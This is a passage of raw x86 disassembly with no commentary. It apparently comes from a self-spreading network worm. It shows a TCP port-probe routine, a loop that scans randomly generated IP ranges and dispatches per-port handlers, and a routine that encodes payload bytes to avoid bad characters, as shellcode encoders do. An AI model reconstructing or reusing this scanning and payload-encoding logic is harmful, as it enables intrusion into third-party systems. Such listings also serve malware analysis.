mov edx, edi
shr edx, 1Fh
lea edi, [ebx+ebx]
or edi, edx
mov edx, [eax+8]
mov esi, ebx
shr esi, 1Fh
lea ebx, [edx+edx]
mov edx, [ebp+arg_0]
or ebx, esi
mov [eax], ecx
mov [eax+4], edi
mov [eax+8], ebx
movsx edx, byte ptr [edx]
lea esi, [ecx+edx]
cmp esi, ecx
mov [ebp+var_10], edx
jb short loc_4138BB
cmp esi, edx
jnb short loc_4138C2
loc_4138BB: ; CODE XREF: sub_4137AA+10B�j
mov [ebp+var_14], 1
loc_4138C2: ; CODE XREF: sub_4137AA+10F�j
cmp [ebp+var_14], 0
mov [eax], esi
jz short loc_4138E6
lea ecx, [edi+1]
xor edx, edx
cmp ecx, edi
jb short loc_4138D8
cmp ecx, 1
jnb short loc_4138DB
loc_4138D8: ; CODE XREF: sub_4137AA+127�j
xor edx, edx
inc edx
loc_4138DB: ; CODE XREF: sub_4137AA+12C�j
test edx, edx
mov [eax+4], ecx
jz short loc_4138E6
inc ebx
mov [eax+8], ebx
loc_4138E6: ; CODE XREF: sub_4137AA+11E�j
; sub_4137AA+136�j
dec [ebp+arg_4]
inc [ebp+arg_0]
cmp [ebp+arg_4], 0
ja loc_4137DA
xor esi, esi
jmp short loc_413920
; ---------------------------------------------------------------------------
loc_4138FA: ; CODE XREF: sub_4137AA+179�j
mov ecx, [eax+4]
mov edx, ecx
shr edx, 10h
mov [eax+8], edx
mov edx, [eax]
mov edi, edx
shl ecx, 10h
shr edi, 10h
or ecx, edi
shl edx, 10h
add [ebp+var_18], 0FFF0h
mov [eax+4], ecx
mov [eax], edx
loc_413920: ; CODE XREF: sub_4137AA+2A�j
; sub_4137AA+14E�j
cmp [eax+8], esi
jz short loc_4138FA
mov ebx, 8000h
test [eax+8], ebx
jnz short loc_41395F
loc_41392F: ; CODE XREF: sub_4137AA+1B3�j
mov esi, [eax]
mov edi, [eax+4]
add [ebp+var_18], 0FFFFh
mov ecx, esi
add esi, esi
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
add ecx, ecx
or ecx, edx
test ecx, ebx
mov [eax+4], esi
mov [eax+8], ecx
jz short loc_41392F
loc_41395F: ; CODE XREF: sub_4137AA+183�j
mov cx, word ptr [ebp+var_18]
mov [eax+0Ah], cx
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4137AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_413976 proc near ; CODE XREF: sub_40423C+24�p
; sub_4086EA+10�p ...
jmp ds:dword_41D1B0
sub_413976 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41397C proc near ; CODE XREF: seg000:00413B78�p
; seg000:00413C9E�p ...
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 128h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor edi, edi
push 6
inc edi
push edi
push 2
mov [ebp+var_18], edi
call ds:dword_41D27C
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4139AD
xor al, al
jmp short loc_413A1F
; ---------------------------------------------------------------------------
loc_4139AD: ; CODE XREF: sub_41397C+2B�j
push [ebp+arg_4]
call ds:dword_41D278
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
mov [ebp+var_14], 2
call ds:dword_41D268
and [ebp+var_1C], 0
push 10h
lea eax, [ebp+var_14]
push eax
push esi
mov [ebp+var_20], 5
mov [ebp+var_124], esi
mov [ebp+var_128], edi
call ds:dword_41D240
lea eax, [ebp+var_20]
push eax
push 0
lea eax, [ebp+var_128]
push eax
push 0
push 0
call ds:dword_41D258
push esi
mov edi, eax
call ds:dword_41D224
test edi, edi
setnle al
loc_413A1F: ; CODE XREF: sub_41397C+2F�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_41397C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 25Ch
mov eax, ds:dword_423064
xor eax, esp
mov [esp+258h], eax
push ebx
push esi
mov esi, [ebp+8]
push edi
push 49h
pop ecx
lea edi, [esp+138h]
rep movsd
loc_413A59: ; CODE XREF: seg000:00413F71�j
; seg000:00413F82�j
lea eax, [esp+18h]
push eax
lea eax, [esp+18h]
push eax
lea eax, [esp+18h]
push eax
lea eax, [esp+18h]
push eax
or edi, 0FFFFFFFFh
lea eax, [esp+248h]
push offset dword_41EEFC
push eax
mov [esp+24h], edi
mov [esp+28h], edi
mov [esp+2Ch], edi
mov [esp+30h], edi
call sub_4035E4
add esp, 18h
cmp byte ptr [esp+24Ah], 0
jz short loc_413AE7
cmp [esp+0Ch], edi
mov esi, 0FEh
jnz short loc_413AB7
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+0Ch], eax
loc_413AB7: ; CODE XREF: seg000:00413AA8�j
cmp [esp+10h], edi
jnz short loc_413ACA
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+10h], eax
loc_413ACA: ; CODE XREF: seg000:00413ABB�j
cmp [esp+14h], edi
jnz short loc_413ADD
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+14h], eax
loc_413ADD: ; CODE XREF: seg000:00413ACE�j
mov eax, [esp+18h]
cmp eax, edi
jnz short loc_413B39
jmp short loc_413B12
; ---------------------------------------------------------------------------
loc_413AE7: ; CODE XREF: seg000:00413A9D�j
mov eax, [esp+250h]
sub eax, 0
jz short loc_413B21
dec eax
jz short loc_413B00
dec eax
jnz short loc_413B35
mov eax, 0FEh
jmp short loc_413B14
; ---------------------------------------------------------------------------
loc_413B00: ; CODE XREF: seg000:00413AF4�j
mov esi, 0FEh
loc_413B05: ; CODE XREF: seg000:00413B33�j
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+14h], eax
loc_413B12: ; CODE XREF: seg000:00413AE5�j
mov eax, esi
loc_413B14: ; CODE XREF: seg000:00413AFE�j
xor ebx, ebx
call sub_4192C7
mov [esp+18h], eax
jmp short loc_413B39
; ---------------------------------------------------------------------------
loc_413B21: ; CODE XREF: seg000:00413AF1�j
mov esi, 0FEh
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+10h], eax
jmp short loc_413B05
; ---------------------------------------------------------------------------
loc_413B35: ; CODE XREF: seg000:00413AF7�j
mov eax, [esp+18h]
loc_413B39: ; CODE XREF: seg000:00413AE3�j
; seg000:00413B1F�j
shl eax, 8
add eax, [esp+14h]
shl eax, 8
add eax, [esp+10h]
shl eax, 8
add eax, [esp+0Ch]
mov [esp+254h], eax
mov eax, [esp+24Ch]
cmp eax, edi
jnz loc_413D78
xor ebx, ebx
mov [esp+20h], ebx
mov eax, offset dword_424548
loc_413B6F: ; CODE XREF: seg000:00413B96�j
push dword ptr [eax]
push dword ptr [esp+258h]
call sub_41397C
test al, al
pop ecx
pop ecx
jnz short loc_413B9D
inc ebx
mov eax, ebx
imul eax, 2Ch
lea eax, dword_424548[eax]
cmp dword ptr [eax], 0
mov [esp+20h], ebx
jnz short loc_413B6F
jmp loc_413F62
; ---------------------------------------------------------------------------
loc_413B9D: ; CODE XREF: seg000:00413B81�j
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset byte_41EF08
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea esi, [eax+1]
loc_413BD7: ; CODE XREF: seg000:00413BDC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413BD7
sub eax, esi
mov [esp+eax+28h], cl
mov eax, [esp+254h]
mov [esp+128h], ebx
imul ebx, 2Ch
mov [esp+12Ch], eax
mov eax, ds:dword_424548[ebx]
mov [esp+130h], eax
mov al, [esp+248h]
sub esp, 110h
mov [esp+244h], al
mov al, [esp+35Ah]
push 44h
pop ecx
mov [esp+245h], al
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[ebx]
mov esi, [esp+128h]
shl esi, 8
add esi, [esp+124h]
add esp, 110h
shl esi, 8
add esi, [esp+10h]
mov dword ptr [esp+1Ch], 100h
shl esi, 8
add esi, [esp+0Ch]
mov [esp+24h], esi
loc_413C70: ; CODE XREF: seg000:00413D6D�j
mov eax, [esp+1Ch]
mov ecx, [esp+14h]
add eax, ecx
shl eax, 8
add eax, [esp+10h]
shl eax, 8
add eax, [esp+0Ch]
cmp eax, esi
mov [esp+254h], eax
jz loc_413D5D
push ds:dword_424548[ebx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413D5D
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset byte_41EF0C
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea esi, [eax+1]
loc_413CE7: ; CODE XREF: seg000:00413CEC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413CE7
sub eax, esi
mov [esp+eax+28h], cl
mov eax, [esp+254h]
mov [esp+12Ch], eax
mov eax, [esp+20h]
mov [esp+128h], eax
mov eax, ds:dword_424548[ebx]
mov [esp+130h], eax
mov al, [esp+248h]
sub esp, 110h
mov [esp+244h], al
mov al, [esp+35Ah]
push 44h
pop ecx
mov [esp+245h], al
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[ebx]
mov esi, [esp+134h]
add esp, 110h
loc_413D5D: ; CODE XREF: seg000:00413C91�j
; seg000:00413CA7�j
add dword ptr [esp+1Ch], 100h
cmp dword ptr [esp+1Ch], 0FE00h
jle loc_413C70
jmp loc_413F5D
; ---------------------------------------------------------------------------
loc_413D78: ; CODE XREF: seg000:00413B5E�j
imul eax, 2Ch
push ds:dword_424548[eax]
push dword ptr [esp+258h]
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F62
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset dword_41EF10
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea ecx, [eax+1]
loc_413DD1: ; CODE XREF: seg000:00413DD6�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413DD1
sub eax, ecx
mov [esp+eax+28h], dl
mov eax, [esp+254h]
mov [esp+12Ch], eax
mov eax, [esp+24Ch]
mov [esp+128h], eax
imul eax, 2Ch
mov ecx, ds:dword_424548[eax]
mov [esp+130h], ecx
mov cl, [esp+248h]
sub esp, 110h
mov [esp+244h], cl
push 44h
pop ecx
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[eax]
mov ebx, [esp+128h]
shl ebx, 8
add ebx, [esp+124h]
add esp, 110h
shl ebx, 8
add ebx, [esp+10h]
mov dword ptr [esp+1Ch], 100h
shl ebx, 8
add ebx, [esp+0Ch]
loc_413E5F: ; CODE XREF: seg000:00413F57�j
mov eax, [esp+1Ch]
mov ecx, [esp+14h]
add eax, ecx
shl eax, 8
add eax, [esp+10h]
shl eax, 8
add eax, [esp+0Ch]
cmp eax, ebx
mov [esp+254h], eax
jz loc_413F47
mov ecx, [esp+24Ch]
imul ecx, 2Ch
push ds:dword_424548[ecx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F47
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset byte_41EF14
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea esi, [eax+1]
loc_413EE0: ; CODE XREF: seg000:00413EE5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413EE0
sub eax, esi
mov [esp+eax+28h], cl
mov eax, [esp+254h]
mov [esp+12Ch], eax
mov eax, [esp+24Ch]
mov [esp+128h], eax
imul eax, 2Ch
mov ecx, ds:dword_424548[eax]
mov [esp+130h], ecx
mov cl, [esp+248h]
sub esp, 110h
mov [esp+244h], cl
push 44h
pop ecx
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[eax]
add esp, 110h
loc_413F47: ; CODE XREF: seg000:00413E80�j
; seg000:00413EA0�j
add dword ptr [esp+1Ch], 100h
cmp dword ptr [esp+1Ch], 0FE00h
jle loc_413E5F
loc_413F5D: ; CODE XREF: seg000:00413D73�j
call sub_4192FB
loc_413F62: ; CODE XREF: seg000:00413B98�j
; seg000:00413D91�j
push 64h
call ds:dword_41D0FC
cmp ds:byte_4269C0, 0
jnz loc_413A59
push 2710h
call ds:dword_41D0FC
jmp loc_413A59
; ---------------------------------------------------------------------------
cmp dword ptr [eax+4], 0
setnz al
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F8F proc near ; CODE XREF: sub_414023+12�p
; sub_414042+5D�p
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
and dword ptr [ebx+4], 0
mov eax, ds:dword_433C4C
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, offset dword_433C48
push esi
push edi
mov [ebp+var_8], eax
mov [ebp+var_10], eax
loc_413FB0: ; CODE XREF: sub_413F8F+4C�j
mov eax, ds:dword_433C4C
lea edi, [ebp+var_10]
lea esi, [ebp+var_8]
mov [ebp+var_C], eax
call sub_40166F
test al, al
jz short loc_414018
call sub_40164F
mov ecx, [ebx]
cmp ecx, [eax+40h]
lea edi, [ebp+var_18]
jz short loc_413FDD
call sub_40168C
jmp short loc_413FB0
; ---------------------------------------------------------------------------
loc_413FDD: ; CODE XREF: sub_413F8F+45�j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
lea esi, [ebp+var_10]
mov [ebp+var_C], eax
call sub_40168C
mov eax, [eax+4]
cmp eax, ds:dword_433C4C
jz short loc_414018
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
push eax
mov [ecx+4], edx
call sub_402F6D
dec ds:dword_433C50
pop ecx
loc_414018: ; CODE XREF: sub_413F8F+36�j
; sub_413F8F+6B�j
push ebx
call sub_402F6D
pop ecx
pop edi
pop esi
leave
retn
sub_413F8F endp
; =============== S U B R O U T I N E =======================================
sub_414023 proc near ; CODE XREF: sub_40243A+7C�p
; sub_419477+10B�p
push ebx
mov ebx, eax
push 0
push dword ptr [ebx+4]
call ds:dword_41D094
test eax, eax
jz short loc_41403E
call sub_413F8F
mov al, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41403E: ; CODE XREF: sub_414023+10�j
xor al, al
pop ebx
retn
sub_414023 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414042 proc near ; CODE XREF: sub_419EA0+4D2�p
; seg000:0041BB65�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
mov eax, ds:dword_433C4C
mov eax, [eax]
push ebx
mov [esp+20h+var_14], eax
mov eax, offset dword_433C48
push esi
push edi
mov [esp+28h+var_18], eax
mov [esp+28h+var_10], eax
loc_414066: ; CODE XREF: sub_414042+54�j
mov eax, ds:dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4140A4
call sub_40164F
mov ecx, [ebp+arg_0]
cmp ecx, [eax+40h]
jz short loc_414098
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_414066
; ---------------------------------------------------------------------------
loc_414098: ; CODE XREF: sub_414042+49�j
call sub_40164F
mov ebx, [eax]
call sub_413F8F
loc_4140A4: ; CODE XREF: sub_414042+3C�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_414042 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140AB proc near ; CODE XREF: sub_40177B+246�p
; sub_4019F3+1F8�p ...
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 54h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push esi
push 0
push ecx
push eax
push 0
push 0
call ds:dword_41D110
test eax, eax
mov [esi+4], eax
jz short loc_414104
push edi
lea eax, [ebp+var_4B]
push 38h
push eax
call sub_402AEE
mov eax, [esi]
add esp, 0Ch
mov [ebp+var_10], eax
mov eax, ds:dword_433C4C
push eax
mov ecx, offset dword_433C48
push ecx
lea eax, [ebp+var_50]
push eax
mov [ebp+var_4C], 0
mov [ebp+var_50], esi
call sub_4016BA
loc_414104: ; CODE XREF: sub_4140AB+27�j
push 1
push dword ptr [esi+4]
call ds:dword_41D07C
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_4140AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41411F proc near ; CODE XREF: sub_41A5C1+1C7�p
; sub_41A5C1+1E1�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 1
push esi
push edi
mov [ebp+var_2], 1
mov [ebp+var_1], 0
jnz loc_414239
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
mov [ebp+var_8], esi
jns short loc_41414E
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_41414E: ; CODE XREF: sub_41411F+28�j
jz short loc_414154
mov [ebp+var_1], 1
loc_414154: ; CODE XREF: sub_41411F:loc_41414E�j
mov eax, 172h
cmp esi, eax
jle short loc_414167
cmp [ebp+var_1], 1
jnz loc_414324
loc_414167: ; CODE XREF: sub_41411F+3C�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_414181
cmp [ebp+var_1], 1
jnz short loc_414181
jmp loc_414324
; ---------------------------------------------------------------------------
loc_41417C: ; CODE XREF: sub_41411F+ED�j
mov eax, 172h
loc_414181: ; CODE XREF: sub_41411F+50�j
; sub_41411F+56�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_424894
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4141C8
loc_4141B0: ; CODE XREF: sub_41411F+A7�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
add al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4141B0
loc_4141C8: ; CODE XREF: sub_41411F+8F�j
cmp [ebp+var_1], 1
jnz short loc_4141D5
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4141D5: ; CODE XREF: sub_41411F+AD�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle short loc_414217
loc_4141DE: ; CODE XREF: sub_41411F+E2�j
mov dl, [edi+ebx]
xor esi, esi
loc_4141E3: ; CODE XREF: sub_41411F+D0�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_4141F3
inc esi
cmp esi, 8
jl short loc_4141E3
jmp short loc_4141F7
; ---------------------------------------------------------------------------
loc_4141F3: ; CODE XREF: sub_41411F+CA�j
mov byte ptr [ebp+arg_0+3], 0
loc_4141F7: ; CODE XREF: sub_41411F+D2�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414203
inc edi
cmp edi, [ebp+var_8]
jl short loc_4141DE
loc_414203: ; CODE XREF: sub_41411F+DC�j
cmp byte ptr [ebp+arg_0+3], 1
jz short loc_414217
cmp cl, 0FFh
jb loc_41417C
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414217: ; CODE XREF: sub_41411F+BD�j
; sub_41411F+E8�j ...
cmp [ebp+var_1], 1
jnz short loc_414226
mov eax, [ebp+var_C]
inc [ebp+arg_8]
mov [ebp+var_8], eax
loc_414226: ; CODE XREF: sub_41411F+FC�j
mov eax, [ebp+arg_8]
cdq
sub eax, edx
sar eax, 1
mov [ebx+3], al
mov eax, [ebp+var_8]
jmp loc_414326
; ---------------------------------------------------------------------------
loc_414239: ; CODE XREF: sub_41411F+14�j
cmp [ebp+arg_0], 2
jnz loc_414324
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
mov [ebp+var_8], esi
jns short loc_414258
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_414258: ; CODE XREF: sub_41411F+132�j
jz short loc_41425E
mov [ebp+var_1], 1
loc_41425E: ; CODE XREF: sub_41411F:loc_414258�j
mov eax, 172h
cmp esi, eax
jle short loc_414271
cmp [ebp+var_1], 1
jnz loc_414324
loc_414271: ; CODE XREF: sub_41411F+146�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_41428B
cmp [ebp+var_1], 1
jnz short loc_41428B
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414286: ; CODE XREF: sub_41411F+1FF�j
mov eax, 172h
loc_41428B: ; CODE XREF: sub_41411F+15A�j
; sub_41411F+160�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_4248B0
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4142D2
loc_4142BA: ; CODE XREF: sub_41411F+1B1�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
xor al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4142BA
loc_4142D2: ; CODE XREF: sub_41411F+199�j
cmp [ebp+var_1], 1
jnz short loc_4142DF
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4142DF: ; CODE XREF: sub_41411F+1B7�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle loc_414217
loc_4142EC: ; CODE XREF: sub_41411F+1F0�j
mov dl, [edi+ebx]
xor esi, esi
loc_4142F1: ; CODE XREF: sub_41411F+1DE�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_414301
inc esi
cmp esi, 8
jl short loc_4142F1
jmp short loc_414305
; ---------------------------------------------------------------------------
loc_414301: ; CODE XREF: sub_41411F+1D8�j
mov byte ptr [ebp+arg_0+3], 0
loc_414305: ; CODE XREF: sub_41411F+1E0�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414311
inc edi
cmp edi, [ebp+var_8]
jl short loc_4142EC
loc_414311: ; CODE XREF: sub_41411F+1EA�j
cmp byte ptr [ebp+arg_0+3], 1
jz loc_414217
cmp cl, 0FFh
jb loc_414286
loc_414324: ; CODE XREF: sub_41411F+42�j
; sub_41411F+58�j ...
xor eax, eax
loc_414326: ; CODE XREF: sub_41411F+115�j
pop edi
pop esi
leave
retn
sub_41411F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41432A proc near ; CODE XREF: sub_41A5C1+19F�p
; sub_41A9DE+490�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
lea edx, [eax+1]
loc_414333: ; CODE XREF: sub_41432A+E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414333
sub eax, edx
push ebx
lea ebx, [eax+0CCh]
cmp ebx, 172h
jg short loc_414393
push esi
push edi
mov edi, [ebp+arg_0]
push ebx
push 0
push edi
call sub_407B70
mov eax, [ebp+arg_4]
add esp, 0Ch
push 32h
pop ecx
mov esi, offset dword_4248D0
rep movsd
movsw
movsb
lea esi, [eax+1]
loc_41436F: ; CODE XREF: sub_41432A+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41436F
sub eax, esi
push eax
mov eax, [ebp+arg_0]
push [ebp+arg_4]
add eax, 0CAh
push eax
call sub_407BF0
add esp, 0Ch
pop edi
mov eax, ebx
pop esi
jmp short loc_414395
; ---------------------------------------------------------------------------
loc_414393: ; CODE XREF: sub_41432A+1F�j
xor eax, eax
loc_414395: ; CODE XREF: sub_41432A+67�j
pop ebx
pop ebp
retn
sub_41432A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4143A0 proc near ; CODE XREF: sub_41B7F9+64�p
xor ecx, ecx
push esi
push edi
mov [eax+8], ecx
mov [eax+0Ch], ecx
mov [eax], ecx
mov [eax+4], ecx
lea edi, [eax+10h]
mov ecx, 10h
mov esi, offset dword_41FE50
rep movsd
pop edi
pop esi
retn
sub_4143A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4143D0 proc near ; CODE XREF: sub_416AE0+BE�p
; sub_416AE0+13B�p ...
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 160h
mov eax, [esp+160h+arg_0]
mov edx, [eax+54h]
push ebx
mov [esp+164h+var_FC], edx
mov edx, [eax+5Ch]
push ebp
push esi
mov [esp+16Ch+var_10C], edx
mov edx, [eax+64h]
push edi
lea esi, [eax+10h]
mov [esp+170h+var_4], esi
mov ecx, 10h
lea edi, [esp+170h+var_158]
rep movsd
mov ecx, [eax+50h]
mov [esp+170h+var_100], ecx
mov ecx, [eax+58h]
mov [esp+170h+var_110], ecx
mov ecx, [eax+60h]
mov [esp+170h+var_108], ecx
mov ecx, [eax+68h]
mov [esp+170h+var_104], edx
mov edx, [eax+6Ch]
mov [esp+170h+var_B8], ecx
mov ecx, [eax+70h]
mov [esp+170h+var_B4], edx
mov edx, [eax+74h]
mov [esp+170h+var_A8], ecx
mov ecx, [eax+78h]
mov [esp+170h+var_A4], edx
mov edx, [eax+7Ch]
mov [esp+170h+var_D0], ecx
mov ecx, [eax+80h]
mov [esp+170h+var_CC], edx
